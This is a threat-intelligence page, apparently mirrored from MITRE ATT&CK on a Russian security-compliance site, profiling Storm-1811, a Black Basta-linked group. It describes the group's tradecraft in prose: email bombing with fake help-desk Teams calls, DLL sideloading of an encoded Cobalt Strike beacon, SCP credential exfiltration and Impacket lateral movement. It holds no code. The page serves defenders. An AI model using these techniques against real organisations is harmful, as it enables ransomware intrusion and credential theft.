Куда я попал?
SECURITM это SGRC система, ? автоматизирующая процессы в службах информационной безопасности. SECURITM помогает построить и управлять ИСПДн, КИИ, ГИС, СМИБ/СУИБ, банковскими системами защиты.
А еще SECURITM это место для обмена опытом и наработками для служб безопасности.

Storm-1811

Storm-1811 is a financially-motivated entity linked to Black Basta ransomware deployment. Storm-1811 is notable for unique phishing and social engineering mechanisms for initial access, such as overloading victim email inboxes with non-malicious spam to prompt a fake "help desk" interaction leading to the deployment of adversary tools and capabilities.(Citation: Microsoft Storm-1811 2024)(Citation: rapid7-email-bombing)(Citation: RedCanary Storm-1811 2024)(Citation: RedCanary June Insights 2024)
ID: G1046
Associated Groups: 
Created: 14 Mar 2025
Last Modified: 14 Mar 2025

Associated Group Descriptions

Name Description

Techniques Used

Domain ID Name Use
Enterprise T1087 .002 Account Discovery: Domain Account

Storm-1811 has performed domain account enumeration during intrusions.(Citation: Microsoft Storm-1811 2024)

Enterprise T1583 .001 Acquire Infrastructure: Domains

Storm-1811 has created domains for use with RMM tools.(Citation: rapid7-email-bombing)

Enterprise T1547 .001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

Storm-1811 has created Windows Registry Run keys that execute various batch scripts to establish persistence on victim devices.(Citation: rapid7-email-bombing)

Enterprise T1059 .001 Command and Scripting Interpreter: PowerShell

Storm-1811 has used PowerShell for multiple purposes, such as using PowerShell scripts executing in an infinite loop to create an SSH connection to a command and control server.(Citation: rapid7-email-bombing)

.003 Command and Scripting Interpreter: Windows Command Shell

Storm-1811 has used multiple batch scripts during initial access and subsequent actions on victim machines.(Citation: Microsoft Storm-1811 2024)(Citation: rapid7-email-bombing)

Enterprise T1074 .001 Data Staged: Local Data Staging

Storm-1811 has locally staged captured credentials for subsequent manual exfiltration.(Citation: rapid7-email-bombing)

Enterprise T1585 .003 Establish Accounts: Cloud Accounts

Storm-1811 has created malicious accounts to enable activity via Microsoft Teams, typically spoofing various IT support and helpdesk themes.(Citation: Microsoft Storm-1811 2024)

Enterprise T1048 .002 Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol

Storm-1811 has exfiltrated captured user credentials via Secure Copy Protocol (SCP).(Citation: rapid7-email-bombing)

Enterprise T1222 .001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification

Storm-1811 has used `cacls.exe` via batch script to modify file and directory permissions in victim environments.(Citation: rapid7-email-bombing)

Enterprise T1574 .001 Hijack Execution Flow: DLL

Storm-1811 has deployed a malicious DLL (7z.DLL) that is sideloaded by a modified, legitimate installer (7zG.exe) when that installer is executed with an additional command line parameter of `b` at runtime to load a Cobalt Strike beacon payload.(Citation: rapid7-email-bombing)

Enterprise T1036 .005 Masquerading: Match Legitimate Resource Name or Location

Storm-1811 has disguised Cobalt Strike installers as a malicious DLL masquerading as part of a legitimate 7zip installation package.(Citation: rapid7-email-bombing)

.010 Masquerading: Masquerade Account Name

Storm-1811 has created Microsoft Teams accounts that spoof IT support and helpdesk members for use in application and voice phishing.(Citation: Microsoft Storm-1811 2024)

Enterprise T1027 .013 Obfuscated Files or Information: Encrypted/Encoded File

Storm-1811 XOR encodes a Cobalt Strike installation payload in a DLL file that is decoded with a hardcoded key when called by a legitimate 7zip installation process.(Citation: rapid7-email-bombing)

Enterprise T1588 .002 Obtain Capabilities: Tool

Storm-1811 acquired various legitimate and malicious tools, such as RMM software and commodity malware packages, for operations.(Citation: Microsoft Storm-1811 2024)(Citation: rapid7-email-bombing)

Enterprise T1566 .002 Phishing: Spearphishing Link

Storm-1811 has distributed malicious links to victims that redirect to EvilProxy-based phishing sites to harvest credentials.(Citation: Microsoft Storm-1811 2024)

.003 Phishing: Spearphishing via Service

Storm-1811 has used Microsoft Teams to send messages and initiate voice calls to victims posing as IT support personnel.(Citation: Microsoft Storm-1811 2024)

.004 Phishing: Spearphishing Voice

Storm-1811 has initiated voice calls with victims posing as IT support to prompt users to download and execute scripts and other tools for initial access.(Citation: Microsoft Storm-1811 2024)(Citation: rapid7-email-bombing)(Citation: RedCanary Storm-1811 2024)

Enterprise T1219 .002 Remote Access Tools: Remote Desktop Software

Storm-1811 has abused multiple types of legitimate remote access software and tools, such as ScreenConnect, NetSupport Manager, and AnyDesk.(Citation: Microsoft Storm-1811 2024)(Citation: rapid7-email-bombing)

Enterprise T1021 .002 Remote Services: SMB/Windows Admin Shares

Storm-1811 has attempted to move laterally in victim environments via SMB using Impacket.(Citation: rapid7-email-bombing)

.004 Remote Services: SSH

Storm-1811 has used OpenSSH to establish an SSH tunnel to victims for persistent access.(Citation: Microsoft Storm-1811 2024)

Enterprise T1204 .002 User Execution: Malicious File

Storm-1811 has prompted users to execute downloaded software and payloads as the result of social engineering activity.(Citation: Microsoft Storm-1811 2024)(Citation: rapid7-email-bombing)(Citation: RedCanary Storm-1811 2024)

Software

ID Name References Techniques
S0357 Impacket (Citation: Impacket Tools) (Citation: rapid7-email-bombing) LLMNR/NBT-NS Poisoning and SMB Relay, Network Sniffing, Kerberoasting, Ccache Files, NTDS, Service Execution, LSASS Memory, Windows Management Instrumentation, Security Account Manager, Lateral Tool Transfer, LSA Secrets
S0190 BITSAdmin (Citation: Microsoft BITSAdmin) (Citation: Microsoft Storm-1811 2024) (Citation: RedCanary June Insights 2024) Lateral Tool Transfer, Exfiltration Over Unencrypted Non-C2 Protocol, Ingress Tool Transfer, BITS Jobs
S1070 Black Basta (Citation: Avertium Black Basta June 2022) (Citation: Cyble Black Basta May 2022) (Citation: Deep Instinct Black Basta August 2022) (Citation: Microsoft Storm-1811 2024) (Citation: Minerva Labs Black Basta May 2022) (Citation: NCC Group Black Basta June 2022) (Citation: Palo Alto Networks Black Basta August 2022) (Citation: rapid7-email-bombing) Inhibit System Recovery, System Information Discovery, Safe Mode Boot, Code Signing, Virtualization/Sandbox Evasion, Internal Defacement, Remote System Discovery, Modify Registry, File and Directory Discovery, Data Encrypted for Impact, Debugger Evasion, Malicious File, Linux and Mac File and Directory Permissions Modification, Windows Command Shell, System Service Discovery, System Checks, PowerShell, Windows Service, Windows Management Instrumentation, Binary Padding, Native API, System Shutdown/Reboot, Match Legitimate Resource Name or Location, Mutual Exclusion, Masquerade Task or Service
S0154 Cobalt Strike (Citation: cobaltstrike manual) (Citation: Microsoft Storm-1811 2024) (Citation: rapid7-email-bombing) Domain Fronting, Sudo and Sudo Caching, Code Signing, Scheduled Transfer, JavaScript, Remote Desktop Protocol, Native API, Pass the Hash, Domain Accounts, Indicator Removal from Tools, Bypass User Account Control, System Network Configuration Discovery, Service Execution, PowerShell, Web Protocols, Application Layer Protocol, Data from Local System, Disable or Modify Tools, Dynamic-link Library Injection, Local Accounts, Multiband Communication, Keylogging, Distributed Component Object Model, Process Discovery, BITS Jobs, Process Hollowing, Software Discovery, Local Accounts, BITS Jobs, Remote Desktop Protocol, Internal Proxy, Exploitation for Privilege Escalation, Screen Capture, Process Argument Spoofing, Modify Registry, Domain Groups, System Network Connections Discovery, Protocol or Service Impersonation, Parent PID Spoofing, Token Impersonation/Theft, Protocol Tunneling, Windows Service, Visual Basic, Native API, Parent PID Spoofing, Process Injection, System Service Discovery, Timestomp, System Network Configuration Discovery, SSH, File and Directory Discovery, DNS, Token Impersonation/Theft, DNS, Bypass User Account Control, Process Hollowing, Scheduled Transfer, Security Account Manager, Local Groups, PowerShell, SSH, Python, Reflective Code Loading, Remote System Discovery, LSASS Memory, Screen Capture, Commonly Used Port, Query Registry, Domain Account, Data Transfer Size Limits, Network Service Discovery, Pass the Hash, Domain Accounts, Network Share Discovery, Web Protocols, Asymmetric Cryptography, Windows Command Shell, Process Injection, Browser Session Hijacking, Deobfuscate/Decode Files or Information, Remote System Discovery, Visual Basic, Protocol Tunneling, Exploitation for Privilege Escalation, Windows Management Instrumentation, Keylogging, Browser Session Hijacking, Windows Remote Management, Symmetric Cryptography, Non-Application Layer Protocol, Standard Encoding, Ingress Tool Transfer, Indicator Removal from Tools, Domain Account, Internal Proxy, Service Execution, Windows Remote Management, SMB/Windows Admin Shares, Rundll32, Windows Service, File Transfer Protocols, Python, SMB/Windows Admin Shares, Windows Management Instrumentation, Security Account Manager, Make and Impersonate Token, Exploitation for Client Execution, Network Service Discovery, Timestomp, Distributed Component Object Model, Multiband Communication, Commonly Used Port, Network Share Discovery, Custom Command and Control Protocol, Process Discovery, Make and Impersonate Token, Data from Local System, Office Template Macros, Windows Command Shell, Obfuscated Files or Information
S0650 QakBot (Citation: ATT QakBot April 2021) (Citation: Kaspersky QakBot September 2021) (Citation: Microsoft Storm-1811 2024) (Citation: Pinkslipbot) (Citation: QBot) (Citation: QuackBot) (Citation: Red Canary Qbot) (Citation: Trend Micro Qakbot December 2020) Regsvr32, Hidden Files and Directories, System Checks, Remote System Discovery, Data from Local System, External Proxy, PowerShell, Windows Command Shell, Security Software Discovery, Native API, Binary Padding, Windows Service, Domain Generation Algorithms, File and Directory Discovery, Registry Run Keys / Startup Folder, Fileless Storage, Masquerade File Type, Network Share Discovery, Process Hollowing, JavaScript, Msiexec, Deobfuscate/Decode Files or Information, Local Email Collection, Malicious Link, System Time Discovery, Malicious File, Exfiltration Over C2 Channel, System Owner/User Discovery, HTML Smuggling, Internet Connection Discovery, Symmetric Cryptography, Command Obfuscation, Web Protocols, Code Signing, Obfuscated Files or Information, Exploitation of Remote Services, Process Discovery, Local Groups, DLL, System Network Configuration Discovery, Steal Web Session Cookie, Process Injection, Domain Trust Discovery, Local Data Staging, Brute Force, Mark-of-the-Web Bypass, Browser Session Hijacking, Time Based Evasion, Ingress Tool Transfer, Peripheral Device Discovery, Non-Application Layer Protocol, Spearphishing Link, Indicator Removal from Tools, Modify Registry, Spearphishing Attachment, Keylogging, Replication Through Removable Media, Standard Encoding, Visual Basic, System Information Discovery, Windows Management Instrumentation, Application Window Discovery, Software Discovery, System Network Connections Discovery, Scheduled Task, Rundll32, Protocol Tunneling, Credentials from Web Browsers, Software Packing, Disable or Modify Tools, File Deletion
S1209 Quick Assist (Citation: Microsoft Quick Assist 2024) (Citation: Microsoft Storm-1811 2024) Web Protocols, Screen Capture, Video Capture
S0029 PsExec (Citation: Microsoft Storm-1811 2024) (Citation: Russinovich Sysinternals) (Citation: SANS PsExec) SMB/Windows Admin Shares, Windows Service, Lateral Tool Transfer, Service Execution, Domain Account

Мы используем cookie-файлы, чтобы получить статистику, которая помогает нам улучшить сервис для вас с целью персонализации сервисов и предложений. Вы может прочитать подробнее о cookie-файлах или изменить настройки браузера. Продолжая пользоваться сайтом, вы даёте согласие на использование ваших cookie-файлов и соглашаетесь с Политикой обработки персональных данных.